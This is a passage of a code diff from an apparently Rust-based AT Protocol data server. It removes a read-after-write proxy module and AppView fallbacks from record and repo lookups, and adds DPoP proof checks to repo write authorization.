95
if let Some(val) = auth_header_val {
96
request_builder = request_builder.header("Authorization", val);
97
}
···
103
if !body.is_empty() {
104
request_builder = request_builder.body(body);
105
}
106
+
107
match request_builder.send().await {
108
Ok(resp) => {
109
let status = resp.status();
-456
src/api/read_after_write.rs
-456
src/api/read_after_write.rs
···
1
-
use crate::api::ApiError;
2
-
use crate::api::proxy_client::{
3
-
MAX_RESPONSE_SIZE, RESPONSE_HEADERS_TO_FORWARD, is_ssrf_safe, proxy_client,
4
-
};
5
-
use crate::state::AppState;
6
-
use axum::{
7
-
Json,
8
-
http::{HeaderMap, HeaderValue, StatusCode},
9
-
response::{IntoResponse, Response},
10
-
};
11
-
use bytes::Bytes;
12
-
use chrono::{DateTime, Utc};
13
-
use cid::Cid;
14
-
use jacquard_repo::storage::BlockStore;
15
-
use serde::{Deserialize, Serialize};
16
-
use serde_json::Value;
17
-
use std::collections::HashMap;
18
-
use tracing::{error, info, warn};
19
-
use uuid::Uuid;
20
-
21
-
pub const REPO_REV_HEADER: &str = "atproto-repo-rev";
22
-
pub const UPSTREAM_LAG_HEADER: &str = "atproto-upstream-lag";
23
-
24
-
#[derive(Debug, Clone, Serialize, Deserialize)]
25
-
#[serde(rename_all = "camelCase")]
26
-
pub struct PostRecord {
27
-
#[serde(rename = "$type")]
28
-
pub record_type: Option<String>,
29
-
pub text: String,
30
-
pub created_at: String,
31
-
#[serde(skip_serializing_if = "Option::is_none")]
32
-
pub reply: Option<Value>,
33
-
#[serde(skip_serializing_if = "Option::is_none")]
34
-
pub embed: Option<Value>,
35
-
#[serde(skip_serializing_if = "Option::is_none")]
36
-
pub langs: Option<Vec<String>>,
37
-
#[serde(skip_serializing_if = "Option::is_none")]
38
-
pub labels: Option<Value>,
39
-
#[serde(skip_serializing_if = "Option::is_none")]
40
-
pub tags: Option<Vec<String>>,
41
-
#[serde(flatten)]
42
-
pub extra: HashMap<String, Value>,
43
-
}
44
-
45
-
#[derive(Debug, Clone, Serialize, Deserialize)]
46
-
#[serde(rename_all = "camelCase")]
47
-
pub struct ProfileRecord {
48
-
#[serde(rename = "$type")]
49
-
pub record_type: Option<String>,
50
-
#[serde(skip_serializing_if = "Option::is_none")]
51
-
pub display_name: Option<String>,
52
-
#[serde(skip_serializing_if = "Option::is_none")]
53
-
pub description: Option<String>,
54
-
#[serde(skip_serializing_if = "Option::is_none")]
55
-
pub avatar: Option<Value>,
56
-
#[serde(skip_serializing_if = "Option::is_none")]
57
-
pub banner: Option<Value>,
58
-
#[serde(flatten)]
59
-
pub extra: HashMap<String, Value>,
60
-
}
61
-
62
-
#[derive(Debug, Clone)]
63
-
pub struct RecordDescript<T> {
64
-
pub uri: String,
65
-
pub cid: String,
66
-
pub indexed_at: DateTime<Utc>,
67
-
pub record: T,
68
-
}
69
-
70
-
#[derive(Debug, Clone, Serialize, Deserialize)]
71
-
#[serde(rename_all = "camelCase")]
72
-
pub struct LikeRecord {
73
-
#[serde(rename = "$type")]
74
-
pub record_type: Option<String>,
75
-
pub subject: LikeSubject,
76
-
pub created_at: String,
77
-
#[serde(flatten)]
78
-
pub extra: HashMap<String, Value>,
79
-
}
80
-
81
-
#[derive(Debug, Clone, Serialize, Deserialize)]
82
-
#[serde(rename_all = "camelCase")]
83
-
pub struct LikeSubject {
84
-
pub uri: String,
85
-
pub cid: String,
86
-
}
87
-
88
-
#[derive(Debug, Default)]
89
-
pub struct LocalRecords {
90
-
pub count: usize,
91
-
pub profile: Option<RecordDescript<ProfileRecord>>,
92
-
pub posts: Vec<RecordDescript<PostRecord>>,
93
-
pub likes: Vec<RecordDescript<LikeRecord>>,
94
-
}
95
-
96
-
pub async fn get_records_since_rev(
97
-
state: &AppState,
98
-
did: &str,
99
-
rev: &str,
100
-
) -> Result<LocalRecords, String> {
101
-
let mut result = LocalRecords::default();
102
-
let user_id: Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
103
-
.fetch_optional(&state.db)
104
-
.await
105
-
.map_err(|e| format!("DB error: {}", e))?
106
-
.ok_or_else(|| "User not found".to_string())?;
107
-
let rows = sqlx::query!(
108
-
r#"
109
-
SELECT record_cid, collection, rkey, created_at, repo_rev
110
-
FROM records
111
-
WHERE repo_id = $1 AND repo_rev > $2
112
-
ORDER BY repo_rev ASC
113
-
LIMIT 10
114
-
"#,
115
-
user_id,
116
-
rev
117
-
)
118
-
.fetch_all(&state.db)
119
-
.await
120
-
.map_err(|e| format!("DB error fetching records: {}", e))?;
121
-
if rows.is_empty() {
122
-
return Ok(result);
123
-
}
124
-
let sanity_check = sqlx::query_scalar!(
125
-
"SELECT 1 as val FROM records WHERE repo_id = $1 AND repo_rev <= $2 LIMIT 1",
126
-
user_id,
127
-
rev
128
-
)
129
-
.fetch_optional(&state.db)
130
-
.await
131
-
.map_err(|e| format!("DB error sanity check: {}", e))?;
132
-
if sanity_check.is_none() {
133
-
warn!("Sanity check failed: no records found before rev {}", rev);
134
-
return Ok(result);
135
-
}
136
-
struct RowData {
137
-
cid_str: String,
138
-
collection: String,
139
-
rkey: String,
140
-
created_at: DateTime<Utc>,
141
-
}
142
-
let mut row_data: Vec<RowData> = Vec::with_capacity(rows.len());
143
-
let mut cids: Vec<Cid> = Vec::with_capacity(rows.len());
144
-
for row in &rows {
145
-
if let Ok(cid) = row.record_cid.parse::<Cid>() {
146
-
cids.push(cid);
147
-
row_data.push(RowData {
148
-
cid_str: row.record_cid.clone(),
149
-
collection: row.collection.clone(),
150
-
rkey: row.rkey.clone(),
151
-
created_at: row.created_at,
152
-
});
153
-
}
154
-
}
155
-
let blocks: Vec<Option<Bytes>> = state
156
-
.block_store
157
-
.get_many(&cids)
158
-
.await
159
-
.map_err(|e| format!("Error fetching blocks: {}", e))?;
160
-
for (data, block_opt) in row_data.into_iter().zip(blocks.into_iter()) {
161
-
let block_bytes = match block_opt {
162
-
Some(b) => b,
163
-
None => continue,
164
-
};
165
-
result.count += 1;
166
-
let uri = format!("at://{}/{}/{}", did, data.collection, data.rkey);
167
-
if data.collection == "app.bsky.actor.profile" && data.rkey == "self" {
168
-
if let Ok(record) = serde_ipld_dagcbor::from_slice::<ProfileRecord>(&block_bytes) {
169
-
result.profile = Some(RecordDescript {
170
-
uri,
171
-
cid: data.cid_str,
172
-
indexed_at: data.created_at,
173
-
record,
174
-
});
175
-
}
176
-
} else if data.collection == "app.bsky.feed.post" {
177
-
if let Ok(record) = serde_ipld_dagcbor::from_slice::<PostRecord>(&block_bytes) {
178
-
result.posts.push(RecordDescript {
179
-
uri,
180
-
cid: data.cid_str,
181
-
indexed_at: data.created_at,
182
-
record,
183
-
});
184
-
}
185
-
} else if data.collection == "app.bsky.feed.like"
186
-
&& let Ok(record) = serde_ipld_dagcbor::from_slice::<LikeRecord>(&block_bytes) {
187
-
result.likes.push(RecordDescript {
188
-
uri,
189
-
cid: data.cid_str,
190
-
indexed_at: data.created_at,
191
-
record,
192
-
});
193
-
}
194
-
}
195
-
Ok(result)
196
-
}
197
-
198
-
pub fn get_local_lag(local: &LocalRecords) -> Option<i64> {
199
-
let mut oldest: Option<DateTime<Utc>> = local.profile.as_ref().map(|p| p.indexed_at);
200
-
for post in &local.posts {
201
-
match oldest {
202
-
None => oldest = Some(post.indexed_at),
203
-
Some(o) if post.indexed_at < o => oldest = Some(post.indexed_at),
204
-
_ => {}
205
-
}
206
-
}
207
-
for like in &local.likes {
208
-
match oldest {
209
-
None => oldest = Some(like.indexed_at),
210
-
Some(o) if like.indexed_at < o => oldest = Some(like.indexed_at),
211
-
_ => {}
212
-
}
213
-
}
214
-
oldest.map(|o| (Utc::now() - o).num_milliseconds())
215
-
}
216
-
217
-
pub fn extract_repo_rev(headers: &HeaderMap) -> Option<String> {
218
-
headers
219
-
.get(REPO_REV_HEADER)
220
-
.and_then(|h| h.to_str().ok())
221
-
.map(|s| s.to_string())
222
-
}
223
-
224
-
#[derive(Debug)]
225
-
pub struct ProxyResponse {
226
-
pub status: StatusCode,
227
-
pub headers: HeaderMap,
228
-
pub body: bytes::Bytes,
229
-
}
230
-
231
-
impl ProxyResponse {
232
-
pub fn into_response(self) -> Response {
233
-
let mut response = Response::builder().status(self.status);
234
-
for (key, value) in self.headers.iter() {
235
-
response = response.header(key, value);
236
-
}
237
-
response.body(axum::body::Body::from(self.body)).unwrap()
238
-
}
239
-
}
240
-
241
-
pub async fn proxy_to_appview_via_registry(
242
-
state: &AppState,
243
-
method: &str,
244
-
params: &HashMap<String, String>,
245
-
auth_did: &str,
246
-
auth_key_bytes: Option<&[u8]>,
247
-
) -> Result<ProxyResponse, Response> {
248
-
let resolved = state.appview_registry.get_appview_for_method(method).await.ok_or_else(|| {
249
-
ApiError::UpstreamUnavailable(format!("No AppView configured for method: {}", method)).into_response()
250
-
})?;
251
-
proxy_to_appview_with_url(method, params, auth_did, auth_key_bytes, &resolved.url, &resolved.did).await
252
-
}
253
-
254
-
pub async fn proxy_to_appview_with_url(
255
-
method: &str,
256
-
params: &HashMap<String, String>,
257
-
auth_did: &str,
258
-
auth_key_bytes: Option<&[u8]>,
259
-
appview_url: &str,
260
-
appview_did: &str,
261
-
) -> Result<ProxyResponse, Response> {
262
-
if let Err(e) = is_ssrf_safe(appview_url) {
263
-
error!("SSRF check failed for appview URL: {}", e);
264
-
return Err(
265
-
ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e)).into_response(),
266
-
);
267
-
}
268
-
let target_url = format!("{}/xrpc/{}", appview_url, method);
269
-
info!(target = %target_url, "Proxying request to appview");
270
-
let client = proxy_client();
271
-
let mut request_builder = client.get(&target_url).query(params);
272
-
if let Some(key_bytes) = auth_key_bytes {
273
-
match crate::auth::create_service_token(auth_did, appview_did, method, key_bytes) {
274
-
Ok(service_token) => {
275
-
request_builder =
276
-
request_builder.header("Authorization", format!("Bearer {}", service_token));
277
-
}
278
-
Err(e) => {
279
-
error!(error = ?e, "Failed to create service token");
280
-
return Err(ApiError::InternalError.into_response());
281
-
}
282
-
}
283
-
}
284
-
match request_builder.send().await {
285
-
Ok(resp) => {
286
-
let status =
287
-
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
288
-
let headers: HeaderMap = resp
289
-
.headers()
290
-
.iter()
291
-
.filter(|(k, _)| {
292
-
RESPONSE_HEADERS_TO_FORWARD
293
-
.iter()
294
-
.any(|h| k.as_str().eq_ignore_ascii_case(h))
295
-
})
296
-
.filter_map(|(k, v)| {
297
-
let name = axum::http::HeaderName::try_from(k.as_str()).ok()?;
298
-
let value = HeaderValue::from_bytes(v.as_bytes()).ok()?;
299
-
Some((name, value))
300
-
})
301
-
.collect();
302
-
let content_length = resp.content_length().unwrap_or(0);
303
-
if content_length > MAX_RESPONSE_SIZE {
304
-
error!(
305
-
content_length,
306
-
max = MAX_RESPONSE_SIZE,
307
-
"Upstream response too large"
308
-
);
309
-
return Err(ApiError::UpstreamFailure.into_response());
310
-
}
311
-
let body = resp.bytes().await.map_err(|e| {
312
-
error!(error = ?e, "Error reading proxy response body");
313
-
ApiError::UpstreamFailure.into_response()
314
-
})?;
315
-
if body.len() as u64 > MAX_RESPONSE_SIZE {
316
-
error!(
317
-
len = body.len(),
318
-
max = MAX_RESPONSE_SIZE,
319
-
"Upstream response body exceeded size limit"
320
-
);
321
-
return Err(ApiError::UpstreamFailure.into_response());
322
-
}
323
-
Ok(ProxyResponse {
324
-
status,
325
-
headers,
326
-
body,
327
-
})
328
-
}
329
-
Err(e) => {
330
-
error!(error = ?e, "Error sending proxy request");
331
-
if e.is_timeout() {
332
-
Err(ApiError::UpstreamTimeout.into_response())
333
-
} else if e.is_connect() {
334
-
Err(
335
-
ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string())
336
-
.into_response(),
337
-
)
338
-
} else {
339
-
Err(ApiError::UpstreamFailure.into_response())
340
-
}
341
-
}
342
-
}
343
-
}
344
-
345
-
pub fn format_munged_response<T: Serialize>(data: T, lag: Option<i64>) -> Response {
346
-
let mut response = (StatusCode::OK, Json(data)).into_response();
347
-
if let Some(lag_ms) = lag
348
-
&& let Ok(header_val) = HeaderValue::from_str(&lag_ms.to_string()) {
349
-
response
350
-
.headers_mut()
351
-
.insert(UPSTREAM_LAG_HEADER, header_val);
352
-
}
353
-
response
354
-
}
355
-
356
-
#[derive(Debug, Clone, Serialize, Deserialize)]
357
-
#[serde(rename_all = "camelCase")]
358
-
pub struct AuthorView {
359
-
pub did: String,
360
-
pub handle: String,
361
-
#[serde(skip_serializing_if = "Option::is_none")]
362
-
pub display_name: Option<String>,
363
-
#[serde(skip_serializing_if = "Option::is_none")]
364
-
pub avatar: Option<String>,
365
-
#[serde(flatten)]
366
-
pub extra: HashMap<String, Value>,
367
-
}
368
-
369
-
#[derive(Debug, Clone, Serialize, Deserialize)]
370
-
#[serde(rename_all = "camelCase")]
371
-
pub struct PostView {
372
-
pub uri: String,
373
-
pub cid: String,
374
-
pub author: AuthorView,
375
-
pub record: Value,
376
-
pub indexed_at: String,
377
-
#[serde(skip_serializing_if = "Option::is_none")]
378
-
pub embed: Option<Value>,
379
-
#[serde(default)]
380
-
pub reply_count: i64,
381
-
#[serde(default)]
382
-
pub repost_count: i64,
383
-
#[serde(default)]
384
-
pub like_count: i64,
385
-
#[serde(default)]
386
-
pub quote_count: i64,
387
-
#[serde(flatten)]
388
-
pub extra: HashMap<String, Value>,
389
-
}
390
-
391
-
#[derive(Debug, Clone, Serialize, Deserialize)]
392
-
#[serde(rename_all = "camelCase")]
393
-
pub struct FeedViewPost {
394
-
pub post: PostView,
395
-
#[serde(skip_serializing_if = "Option::is_none")]
396
-
pub reply: Option<Value>,
397
-
#[serde(skip_serializing_if = "Option::is_none")]
398
-
pub reason: Option<Value>,
399
-
#[serde(skip_serializing_if = "Option::is_none")]
400
-
pub feed_context: Option<String>,
401
-
#[serde(flatten)]
402
-
pub extra: HashMap<String, Value>,
403
-
}
404
-
405
-
#[derive(Debug, Clone, Serialize, Deserialize)]
406
-
pub struct FeedOutput {
407
-
pub feed: Vec<FeedViewPost>,
408
-
#[serde(skip_serializing_if = "Option::is_none")]
409
-
pub cursor: Option<String>,
410
-
}
411
-
412
-
pub fn format_local_post(
413
-
descript: &RecordDescript<PostRecord>,
414
-
author_did: &str,
415
-
author_handle: &str,
416
-
profile: Option<&RecordDescript<ProfileRecord>>,
417
-
) -> PostView {
418
-
let display_name = profile.and_then(|p| p.record.display_name.clone());
419
-
PostView {
420
-
uri: descript.uri.clone(),
421
-
cid: descript.cid.clone(),
422
-
author: AuthorView {
423
-
did: author_did.to_string(),
424
-
handle: author_handle.to_string(),
425
-
display_name,
426
-
avatar: None,
427
-
extra: HashMap::new(),
428
-
},
429
-
record: serde_json::to_value(&descript.record).unwrap_or(Value::Null),
430
-
indexed_at: descript.indexed_at.to_rfc3339(),
431
-
embed: descript.record.embed.clone(),
432
-
reply_count: 0,
433
-
repost_count: 0,
434
-
like_count: 0,
435
-
quote_count: 0,
436
-
extra: HashMap::new(),
437
-
}
438
-
}
439
-
440
-
pub fn insert_posts_into_feed(feed: &mut Vec<FeedViewPost>, posts: Vec<PostView>) {
441
-
if posts.is_empty() {
442
-
return;
443
-
}
444
-
let new_items: Vec<FeedViewPost> = posts
445
-
.into_iter()
446
-
.map(|post| FeedViewPost {
447
-
post,
448
-
reply: None,
449
-
reason: None,
450
-
feed_context: None,
451
-
extra: HashMap::new(),
452
-
})
453
-
.collect();
454
-
feed.extend(new_items);
455
-
feed.sort_by(|a, b| b.post.indexed_at.cmp(&a.post.indexed_at));
456
-
}
···
+14
-57
src/api/repo/meta.rs
+14
-57
src/api/repo/meta.rs
···
1
-
use crate::api::proxy_client::proxy_client;
2
use crate::state::AppState;
3
use axum::{
4
Json,
5
-
extract::{Query, RawQuery, State},
6
http::StatusCode,
7
response::{IntoResponse, Response},
8
};
9
use serde::Deserialize;
10
use serde_json::json;
11
-
use tracing::{error, info};
12
13
#[derive(Deserialize)]
14
pub struct DescribeRepoInput {
15
pub repo: String,
16
}
17
18
-
async fn proxy_describe_repo_to_appview(state: &AppState, raw_query: Option<&str>) -> Response {
19
-
let resolved = match state.appview_registry.get_appview_for_method("com.atproto.repo.describeRepo").await {
20
-
Some(r) => r,
21
-
None => {
22
-
return (
23
-
StatusCode::NOT_FOUND,
24
-
Json(json!({"error": "NotFound", "message": "Repo not found"})),
25
-
)
26
-
.into_response();
27
-
}
28
-
};
29
-
let target_url = match raw_query {
30
-
Some(q) => format!("{}/xrpc/com.atproto.repo.describeRepo?{}", resolved.url, q),
31
-
None => format!("{}/xrpc/com.atproto.repo.describeRepo", resolved.url),
32
-
};
33
-
info!("Proxying describeRepo to AppView: {}", target_url);
34
-
let client = proxy_client();
35
-
match client.get(&target_url).send().await {
36
-
Ok(resp) => {
37
-
let status =
38
-
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
39
-
let content_type = resp
40
-
.headers()
41
-
.get("content-type")
42
-
.and_then(|v| v.to_str().ok())
43
-
.map(|s| s.to_string());
44
-
match resp.bytes().await {
45
-
Ok(body) => {
46
-
let mut builder = Response::builder().status(status);
47
-
if let Some(ct) = content_type {
48
-
builder = builder.header("content-type", ct);
49
-
}
50
-
builder
51
-
.body(axum::body::Body::from(body))
52
-
.unwrap_or_else(|_| {
53
-
(StatusCode::INTERNAL_SERVER_ERROR, "Internal error").into_response()
54
-
})
55
-
}
56
-
Err(e) => {
57
-
error!("Error reading AppView response: {:?}", e);
58
-
(StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response()
59
-
}
60
-
}
61
-
}
62
-
Err(e) => {
63
-
error!("Error proxying to AppView: {:?}", e);
64
-
(StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response()
65
-
}
66
-
}
67
-
}
68
-
69
pub async fn describe_repo(
70
State(state): State<AppState>,
71
Query(input): Query<DescribeRepoInput>,
72
-
RawQuery(raw_query): RawQuery,
73
) -> Response {
74
let user_row = if input.repo.starts_with("did:") {
75
sqlx::query!(
···
90
};
91
let (user_id, handle, did) = match user_row {
92
Ok(Some((id, handle, did))) => (id, handle, did),
93
-
_ => {
94
-
return proxy_describe_repo_to_appview(&state, raw_query.as_deref()).await;
95
}
96
};
97
let collections_query = sqlx::query!(
···
1
use crate::state::AppState;
2
use axum::{
3
Json,
4
+
extract::{Query, State},
5
http::StatusCode,
6
response::{IntoResponse, Response},
7
};
8
use serde::Deserialize;
9
use serde_json::json;
10
11
#[derive(Deserialize)]
12
pub struct DescribeRepoInput {
13
pub repo: String,
14
}
15
16
pub async fn describe_repo(
17
State(state): State<AppState>,
18
Query(input): Query<DescribeRepoInput>,
19
) -> Response {
20
let user_row = if input.repo.starts_with("did:") {
21
sqlx::query!(
···
36
};
37
let (user_id, handle, did) = match user_row {
38
Ok(Some((id, handle, did))) => (id, handle, did),
39
+
Ok(None) => {
40
+
return (
41
+
StatusCode::NOT_FOUND,
42
+
Json(json!({"error": "RepoNotFound", "message": "Repo not found"})),
43
+
)
44
+
.into_response();
45
+
}
46
+
Err(_) => {
47
+
return (
48
+
StatusCode::INTERNAL_SERVER_ERROR,
49
+
Json(json!({"error": "InternalError"})),
50
+
)
51
+
.into_response();
52
}
53
};
54
let collections_query = sqlx::query!(
+2
-1
src/api/repo/record/delete.rs
+2
-1
src/api/repo/record/delete.rs
···
31
pub async fn delete_record(
32
State(state): State<AppState>,
33
headers: HeaderMap,
34
Json(input): Json<DeleteRecordInput>,
35
) -> Response {
36
let (did, user_id, current_root_cid) =
37
-
match prepare_repo_write(&state, &headers, &input.repo).await {
38
Ok(res) => res,
39
Err(err_res) => return err_res,
40
};
···
31
pub async fn delete_record(
32
State(state): State<AppState>,
33
headers: HeaderMap,
34
+
axum::extract::OriginalUri(uri): axum::extract::OriginalUri,
35
Json(input): Json<DeleteRecordInput>,
36
) -> Response {
37
let (did, user_id, current_root_cid) =
38
+
match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await {
39
Ok(res) => res,
40
Err(err_res) => return err_res,
41
};
+28
-119
src/api/repo/record/read.rs
+28
-119
src/api/repo/record/read.rs
···
1
-
use crate::api::proxy_client::proxy_client;
2
use crate::state::AppState;
3
use axum::{
4
Json,
5
-
extract::{Query, RawQuery, State},
6
http::StatusCode,
7
response::{IntoResponse, Response},
8
};
···
12
use serde_json::json;
13
use std::collections::HashMap;
14
use std::str::FromStr;
15
-
use tracing::{error, info};
16
17
#[derive(Deserialize)]
18
pub struct GetRecordInput {
···
22
pub cid: Option<String>,
23
}
24
25
-
async fn proxy_get_record_to_appview(state: &AppState, raw_query: Option<&str>) -> Response {
26
-
let resolved = match state.appview_registry.get_appview_for_method("com.atproto.repo.getRecord").await {
27
-
Some(r) => r,
28
-
None => {
29
-
return (
30
-
StatusCode::NOT_FOUND,
31
-
Json(json!({"error": "NotFound", "message": "Repo not found"})),
32
-
)
33
-
.into_response();
34
-
}
35
-
};
36
-
let target_url = match raw_query {
37
-
Some(q) => format!("{}/xrpc/com.atproto.repo.getRecord?{}", resolved.url, q),
38
-
None => format!("{}/xrpc/com.atproto.repo.getRecord", resolved.url),
39
-
};
40
-
info!("Proxying getRecord to AppView: {}", target_url);
41
-
let client = proxy_client();
42
-
match client.get(&target_url).send().await {
43
-
Ok(resp) => {
44
-
let status =
45
-
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
46
-
let content_type = resp
47
-
.headers()
48
-
.get("content-type")
49
-
.and_then(|v| v.to_str().ok())
50
-
.map(|s| s.to_string());
51
-
match resp.bytes().await {
52
-
Ok(body) => {
53
-
let mut builder = Response::builder().status(status);
54
-
if let Some(ct) = content_type {
55
-
builder = builder.header("content-type", ct);
56
-
}
57
-
builder
58
-
.body(axum::body::Body::from(body))
59
-
.unwrap_or_else(|_| {
60
-
(StatusCode::INTERNAL_SERVER_ERROR, "Internal error").into_response()
61
-
})
62
-
}
63
-
Err(e) => {
64
-
error!("Error reading AppView response: {:?}", e);
65
-
(
66
-
StatusCode::BAD_GATEWAY,
67
-
Json(json!({"error": "UpstreamError"})),
68
-
)
69
-
.into_response()
70
-
}
71
-
}
72
-
}
73
-
Err(e) => {
74
-
error!("Error proxying to AppView: {:?}", e);
75
-
(
76
-
StatusCode::BAD_GATEWAY,
77
-
Json(json!({"error": "UpstreamError"})),
78
-
)
79
-
.into_response()
80
-
}
81
-
}
82
-
}
83
-
84
pub async fn get_record(
85
State(state): State<AppState>,
86
Query(input): Query<GetRecordInput>,
87
-
RawQuery(raw_query): RawQuery,
88
) -> Response {
89
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
90
let user_id_opt = if input.repo.starts_with("did:") {
···
106
};
107
let user_id: uuid::Uuid = match user_id_opt {
108
Ok(Some(id)) => id,
109
-
_ => {
110
-
return proxy_get_record_to_appview(&state, raw_query.as_deref()).await;
111
}
112
};
113
let record_row = sqlx::query!(
···
192
pub records: Vec<serde_json::Value>,
193
}
194
195
-
async fn proxy_list_records_to_appview(state: &AppState, raw_query: Option<&str>) -> Response {
196
-
let resolved = match state.appview_registry.get_appview_for_method("com.atproto.repo.listRecords").await {
197
-
Some(r) => r,
198
-
None => {
199
-
return (
200
-
StatusCode::NOT_FOUND,
201
-
Json(json!({"error": "NotFound", "message": "Repo not found"})),
202
-
)
203
-
.into_response();
204
-
}
205
-
};
206
-
let target_url = match raw_query {
207
-
Some(q) => format!("{}/xrpc/com.atproto.repo.listRecords?{}", resolved.url, q),
208
-
None => format!("{}/xrpc/com.atproto.repo.listRecords", resolved.url),
209
-
};
210
-
info!("Proxying listRecords to AppView: {}", target_url);
211
-
let client = proxy_client();
212
-
match client.get(&target_url).send().await {
213
-
Ok(resp) => {
214
-
let status =
215
-
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
216
-
let content_type = resp
217
-
.headers()
218
-
.get("content-type")
219
-
.and_then(|v| v.to_str().ok())
220
-
.map(|s| s.to_string());
221
-
match resp.bytes().await {
222
-
Ok(body) => {
223
-
let mut builder = Response::builder().status(status);
224
-
if let Some(ct) = content_type {
225
-
builder = builder.header("content-type", ct);
226
-
}
227
-
builder
228
-
.body(axum::body::Body::from(body))
229
-
.unwrap_or_else(|_| {
230
-
(StatusCode::INTERNAL_SERVER_ERROR, "Internal error").into_response()
231
-
})
232
-
}
233
-
Err(e) => {
234
-
error!("Error reading AppView response: {:?}", e);
235
-
(StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response()
236
-
}
237
-
}
238
-
}
239
-
Err(e) => {
240
-
error!("Error proxying to AppView: {:?}", e);
241
-
(StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response()
242
-
}
243
-
}
244
-
}
245
-
246
pub async fn list_records(
247
State(state): State<AppState>,
248
Query(input): Query<ListRecordsInput>,
249
-
RawQuery(raw_query): RawQuery,
250
) -> Response {
251
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
252
let user_id_opt = if input.repo.starts_with("did:") {
···
268
};
269
let user_id: uuid::Uuid = match user_id_opt {
270
Ok(Some(id)) => id,
271
-
_ => {
272
-
return proxy_list_records_to_appview(&state, raw_query.as_deref()).await;
273
}
274
};
275
let limit = input.limit.unwrap_or(50).clamp(1, 100);
···
1
use crate::state::AppState;
2
use axum::{
3
Json,
4
+
extract::{Query, State},
5
http::StatusCode,
6
response::{IntoResponse, Response},
7
};
···
11
use serde_json::json;
12
use std::collections::HashMap;
13
use std::str::FromStr;
14
+
use tracing::error;
15
16
#[derive(Deserialize)]
17
pub struct GetRecordInput {
···
21
pub cid: Option<String>,
22
}
23
24
pub async fn get_record(
25
State(state): State<AppState>,
26
Query(input): Query<GetRecordInput>,
27
) -> Response {
28
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
29
let user_id_opt = if input.repo.starts_with("did:") {
···
45
};
46
let user_id: uuid::Uuid = match user_id_opt {
47
Ok(Some(id)) => id,
48
+
Ok(None) => {
49
+
return (
50
+
StatusCode::NOT_FOUND,
51
+
Json(json!({"error": "RepoNotFound", "message": "Repo not found"})),
52
+
)
53
+
.into_response();
54
+
}
55
+
Err(_) => {
56
+
return (
57
+
StatusCode::INTERNAL_SERVER_ERROR,
58
+
Json(json!({"error": "InternalError"})),
59
+
)
60
+
.into_response();
61
}
62
};
63
let record_row = sqlx::query!(
···
142
pub records: Vec<serde_json::Value>,
143
}
144
145
pub async fn list_records(
146
State(state): State<AppState>,
147
Query(input): Query<ListRecordsInput>,
148
) -> Response {
149
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
150
let user_id_opt = if input.repo.starts_with("did:") {
···
166
};
167
let user_id: uuid::Uuid = match user_id_opt {
168
Ok(Some(id)) => id,
169
+
Ok(None) => {
170
+
return (
171
+
StatusCode::NOT_FOUND,
172
+
Json(json!({"error": "RepoNotFound", "message": "Repo not found"})),
173
+
)
174
+
.into_response();
175
+
}
176
+
Err(_) => {
177
+
return (
178
+
StatusCode::INTERNAL_SERVER_ERROR,
179
+
Json(json!({"error": "InternalError"})),
180
+
)
181
+
.into_response();
182
}
183
};
184
let limit = input.limit.unwrap_or(50).clamp(1, 100);
+27
-12
src/api/repo/record/write.rs
+27
-12
src/api/repo/record/write.rs
···
56
state: &AppState,
57
headers: &HeaderMap,
58
repo_did: &str,
59
) -> Result<(String, Uuid, Cid), Response> {
60
-
let token = crate::auth::extract_bearer_token_from_header(
61
headers.get("Authorization").and_then(|h| h.to_str().ok()),
62
)
63
.ok_or_else(|| {
···
67
)
68
.into_response()
69
})?;
70
-
let auth_user = crate::auth::validate_bearer_token(&state.db, &token)
71
-
.await
72
-
.map_err(|_| {
73
-
(
74
-
StatusCode::UNAUTHORIZED,
75
-
Json(json!({"error": "AuthenticationFailed"})),
76
-
)
77
-
.into_response()
78
-
})?;
79
if repo_did != auth_user.did {
80
return Err((
81
StatusCode::FORBIDDEN,
···
172
pub async fn create_record(
173
State(state): State<AppState>,
174
headers: HeaderMap,
175
Json(input): Json<CreateRecordInput>,
176
) -> Response {
177
let (did, user_id, current_root_cid) =
178
-
match prepare_repo_write(&state, &headers, &input.repo).await {
179
Ok(res) => res,
180
Err(err_res) => return err_res,
181
};
···
339
pub async fn put_record(
340
State(state): State<AppState>,
341
headers: HeaderMap,
342
Json(input): Json<PutRecordInput>,
343
) -> Response {
344
let (did, user_id, current_root_cid) =
345
-
match prepare_repo_write(&state, &headers, &input.repo).await {
346
Ok(res) => res,
347
Err(err_res) => return err_res,
348
};
···
56
state: &AppState,
57
headers: &HeaderMap,
58
repo_did: &str,
59
+
http_method: &str,
60
+
http_uri: &str,
61
) -> Result<(String, Uuid, Cid), Response> {
62
+
let extracted = crate::auth::extract_auth_token_from_header(
63
headers.get("Authorization").and_then(|h| h.to_str().ok()),
64
)
65
.ok_or_else(|| {
···
69
)
70
.into_response()
71
})?;
72
+
let dpop_proof = headers
73
+
.get("DPoP")
74
+
.and_then(|h| h.to_str().ok());
75
+
let auth_user = crate::auth::validate_token_with_dpop(
76
+
&state.db,
77
+
&extracted.token,
78
+
extracted.is_dpop,
79
+
dpop_proof,
80
+
http_method,
81
+
http_uri,
82
+
false,
83
+
)
84
+
.await
85
+
.map_err(|e| {
86
+
(
87
+
StatusCode::UNAUTHORIZED,
88
+
Json(json!({"error": e.to_string()})),
89
+
)
90
+
.into_response()
91
+
})?;
92
if repo_did != auth_user.did {
93
return Err((
94
StatusCode::FORBIDDEN,
···
185
pub async fn create_record(
186
State(state): State<AppState>,
187
